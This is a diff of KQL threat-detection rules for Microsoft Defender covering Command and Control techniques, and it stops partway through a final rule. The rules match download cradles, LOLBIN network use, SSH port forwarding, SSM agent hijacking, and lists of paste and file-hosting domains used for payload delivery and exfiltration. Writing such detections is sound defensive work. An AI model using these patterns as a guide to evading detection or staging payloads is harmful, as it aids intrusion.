+1,10 @@ -// Title: Network Connection Initiated By IMEWDBLD.EXE -// Author: frack113 -// Date: 2022-01-22 -// Level: high -// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceNetworkEvents +// Title: Network Connection Initiated By IMEWDBLD.EXE +// Author: frack113 +// Date: 2022-01-22 +// Level: high +// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql index 02cb3442..b45c7855 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql @@ -1,10 +1,10 @@ -// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2017-03-19 -// Level: high -// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceNetworkEvents +// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents | where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql index 084bc6b6..75b2be6b 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql @@ -1,10 +1,10 @@ -// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-24 -// Level: medium -// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 - -DeviceNetworkEvents +// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 + +DeviceNetworkEvents | where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql index e717d49b..5feed99f 100644 --- a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql +++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql @@ -1,14 +1,14 @@ -// Title: New Connection Initiated To Potential Dead Drop Resolver Domain -// Author: Sorina Ionescu, X__Junior (Nextron Systems) -// Date: 2022-08-17 -// Level: high -// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. -// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 -// False Positives: -// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. -// - Ninite contacting githubusercontent.com - -DeviceNetworkEvents +// Title: New Connection Initiated To Potential Dead Drop Resolver Domain +// Author: Sorina Ionescu, X__Junior (Nextron Systems) +// Date: 2022-08-17 +// Level: high +// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. +// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 +// False Positives: +// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender. +// - Ninite contacting githubusercontent.com + +DeviceNetworkEvents | where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith "GoogleDriveFS.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\"))))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql index 06f4adac..377a8332 100644 --- a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql +++ b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql @@ -1,12 +1,12 @@ -// Title: Outbound Network Connection Initiated By Script Interpreter -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-08-28 -// Level: high -// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate scripts - -DeviceNetworkEvents +// Title: Outbound Network Connection Initiated By Script Interpreter +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-28 +// Level: high +// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate scripts + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql index a99fec95..cc1278d9 100644 --- a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql +++ b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql @@ -1,12 +1,12 @@ -// Title: Port Forwarding Activity Via SSH.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-12 -// Level: medium -// Description: Detects port forwarding activity via SSH.exe -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004 -// False Positives: -// - Administrative activity using a remote port forwarding to a local port - -DeviceProcessEvents +// Title: Port Forwarding Activity Via SSH.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-12 +// Level: medium +// Description: Detects port forwarding activity via SSH.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004 +// False Positives: +// - Administrative activity using a remote port forwarding to a local port + +DeviceProcessEvents | where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql index d7aeff45..4348ae16 100644 --- a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql +++ b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql @@ -1,12 +1,12 @@ -// Title: Potential Amazon SSM Agent Hijacking -// Author: Muhammad Faisal -// Date: 2023-08-02 -// Level: medium -// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 -// False Positives: -// - Legitimate activity of system administrators - -DeviceProcessEvents +// Title: Potential Amazon SSM Agent Hijacking +// Author: Muhammad Faisal +// Date: 2023-08-02 +// Level: medium +// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 +// False Positives: +// - Legitimate activity of system administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql index e4aa4b71..1be42575 100644 --- a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql +++ b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql @@ -1,12 +1,12 @@ -// Title: Potential COM Objects Download Cradles Usage - Process Creation -// Author: frack113 -// Date: 2022-12-25 -// Level: medium -// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate use of the library - -DeviceProcessEvents +// Title: Potential COM Objects Download Cradles Usage - Process Creation +// Author: frack113 +// Date: 2022-12-25 +// Level: medium +// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of the library + +DeviceProcessEvents | where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql index a0a9fa10..28c36ac5 100644 --- a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql +++ b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest -// Author: Florian Roth (Nextron Systems), Hieu Tran -// Date: 2023-03-13 -// Level: medium -// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105 - -DeviceProcessEvents +// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest +// Author: Florian Roth (Nextron Systems), Hieu Tran +// Date: 2023-03-13 +// Level: medium +// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql index 90364892..25801352 100644 --- a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql +++ b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql @@ -1,10 +1,10 @@ -// Title: Potential Download/Upload Activity Using Type Command -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-14 -// Level: medium -// Description: Detects usage of the "type" command to download/upload data from WebDAV server -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Potential Download/Upload Activity Using Type Command +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-14 +// Level: medium +// Description: Detects usage of the "type" command to download/upload data from WebDAV server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql index 18429419..50020784 100644 --- a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql +++ b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql @@ -1,10 +1,10 @@ -// Title: Potential In-Memory Download And Compile Of Payloads -// Author: Sohan G (D4rkCiph3r), Red Canary (idea) -// Date: 2023-08-22 -// Level: medium -// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, 